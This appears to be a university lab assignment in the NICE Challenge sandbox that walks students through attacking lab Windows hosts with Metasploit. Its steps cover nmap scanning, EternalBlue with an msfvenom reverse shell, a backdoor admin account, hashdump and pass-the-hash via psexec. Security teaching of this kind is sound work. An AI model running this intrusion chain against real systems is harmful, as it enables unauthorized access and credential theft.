Lab 9 - NICE Challenge - Professor Shafer Special
In this lab you are going to use Metasploit to target systems running Microsoft Windows.
- Environment: Pretty Safe Electronics
- Challenge Title: Unauthorized Activity Alert (or any challenge in the PSE environment)
- Access via https://portal.nice-challenge.com/
In this lab, you're going to use the NICE Challenge ecosystem and its virtual machines, but Professor Shafer has gone completely off the rails and wrote a new assignment using the "Pretty Safe Electronics" network. Ignore the NICE challenge self-tests and ignore the NICE submission system - submit this assignment through Canvas.
Part 1 - Scanning
Log onto the
Security-Desk system. It's Kali Linux, just an older release than what you have installed on your own computer.
Do a nmap scan of the domain controller ("AD-Server", short for Active Directory Server, on the network map) from within Metasploit. Tell nmap to include all the details and tests in its scanning. What command do you use?
- What nmap command do you use to scan the domain controller?
- From the 'hosts' view of Metasploit, what is the hostname of the domain controller?
- From the 'services' view of Metasploit, what version of SSH is the domain controller running? (Include the protocol part too)
- From the 'services' view of Metasploit, what version of Windows is the domain controller running? (Include the Release and Build part)
Part 2 - Exploit
Search for exploits related to the eternalblue exploit, which is effective on many (unpatched) versions of Windows.
msf6> search eternalblue
Metasploit has a scanner for eternalblue. Let's use that first.
msf6> use auxiliary/scanner/smb/smb_ms17_010 msf6> info msf6> options msf6> set RHOSTS 172.16.30.55 # RHOSTS, plural, because it could scan many hosts msf6> exploit # Scanner will run and report results
Ah, a vulnerability was found! Let's use the eternalblue exploit, then.
Based on instructions How to Exploit Eternalblue to get a Meterpreter Session on Windows Server 2012 R2
eternalblue8_exploit.py from https://gist.github.com/worawit (Just use the web browser on security-desk)
Download the eternalblue kernel shellcode
eternalblue_x64_kshellcode.asm from https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501#file-eternalblue_x64_kshellcode-asm (just use the web browser on the security-desk)
Assemble the kernel shellcode (transform the raw assembly code into binary machine code)
$ nasm -f bin eternalblue_x64_kshellcode.asm
Generate a userland shell payload using
msfvenom. Note that
LPORT point to the Security-Desk machine. It's the "local" machine from the perspective of the exploit.
$ msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=172.16.20.55 LPORT=4444
Combine the kernel and userland shellcode
$ cat eternalblue_x64_kshellcode shell_msf.bin > reverse_shell.bin
Set up Metasploit to receive the meterpreter shell as soon as it is running
msf6> use exploit/multi/handler msf6> set PAYLOAD windows/x64/shell/reverse_tcp msf6> set LHOST 172.16.20.55 # IP of Security-Desk, which will listen msf6> set LPORT 4444 msf6> exploit -j # Run exploit handler as a background job ### Leave this running and waiting
Install Impacket utility that exploit needs to function
# Need to install impacket on Python 2.7, but pip is not installed for that Python version. (System pip is for Python 3.x) # First install pip, then upgrade the setup tools, then finally install impacket $ wget https://bootstrap.pypa.io/pip/2.7/get-pip.py $ sudo python get-pip.py $ sudo python -m pip install --upgrade setuptools $ sudo python -m pip install impacket
Run the exploit
$ python eternalblue8_exploit.py 172.16.30.55 reverse_shell.bin 500
What sessions have been created?
msf6> sessions msf6> sessions -i <num> # where <num> = Number of session that just opened
- Upload a screenshot showing your active shell on the Domain Controller
Part 3 - Post-Exploit
Now that you have initial access to the system, take advantage of it.
- What user are you on the domain controller? Use the
- Create a new account on the domain controller with username "evilhacker" and password "pwned". What command did you enter at the shell to accomplish this?
- Elevate that "evilhacker" user to the administrator group. What command did you enter at the shell to accomplish this?
- Obtain a list of users on the domain controller at the command line. Upload a screenshot where 'evilhacker' is visible
- Back in the NICE webportal, launch the remote desktop interface to the domain controller. Log in as 'evilhacker' and provide a screenshot showing 'evilhacker' as your current username as proof of work.
Switch back to the Security-Desk and Metasploit now. Background the running shell (exploit) with
CTRL-Z, then enter
y when prompted to "Background session?"
Now upgrade your shell to Meterpreter.
msf6> search shell_to_meterpreter msf6> use post/multi/manage/shell_to_meterpreter msf6> options msf6> set SESSION <num> # Where <num> is session you JUST backgrounded msf6> exploit # Should see "Meterpreter session <num> opened" msf6> sessions
Take a screenshot at this point as a deliverable.
Connect to that active Meterpreter session on the domain controller.
msf6> sessions -i <num> # Where <num> is NEW meterpreter session
There's lots of fun things to do here!
meterpreter> sysinfo # Where am I running? Should be domain controller meterpreter> getprivs # See what permissions we have meterpreter> ps # Process list meterpreter> getsystem # Ensure we're escalated to SYSTEM access, it not already meterpreter> migrate <pid> # Migrate to another process - Look for vds.exe and use its PID meterpreter> hashdump
These password hashes are perfect for brute forcing, and are also useful for Windows pass-the-hash attacks (where you don't need the original password, just the hash will suffice).
- Submit a screenshot showing both your original shell session and new Meterpreter session active. (Use the
sessionscommand in Metasploit)
- Submit a screenshot showing the password hashes that exist on the domain controller. (Use the
hashdumpcommand in Meterpreter)
- What is the full hash for UID 500 (the original administrator)? Provide the entire line you get from hashdump.
Tip: Rather than manually typing it out (error-prone), use the https://cl1p.net website for a basic clipboard between the NICE VM and whatever system you are completing this Canvas assignment on.
Background the meterpreter shell on the domain controller:
Part 4 - Pass-the-Hash
Let's use a Pass-The-Hash attack to gain shell access to the
DATABASE computer without needing to brute force the password plaintext. This is a "feature" of older versions of Windows.
msf6> use exploit/windows/smb/psexec msf6> set RHOST 172.16.30.88 # The DATABASE host msf6> set SMBUser Administrator msf6> set SMBPass TheHashedPassword msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6> set LHOST 172.16.20.55 # Security-Desk msf6> set LPORT 4445 # We need a different port since 4444 is already in use by Meterpreter on the Domain Controller msf6> exploit -j msf6> sessions
- Submit a screenshot showing all three sessions active. (The original shell to the domain controller, the Meterpreter shell to the domain controller, and the Meterpreter shell to the database).
- Submit a screenshot showing the output of
sysinfoon the database.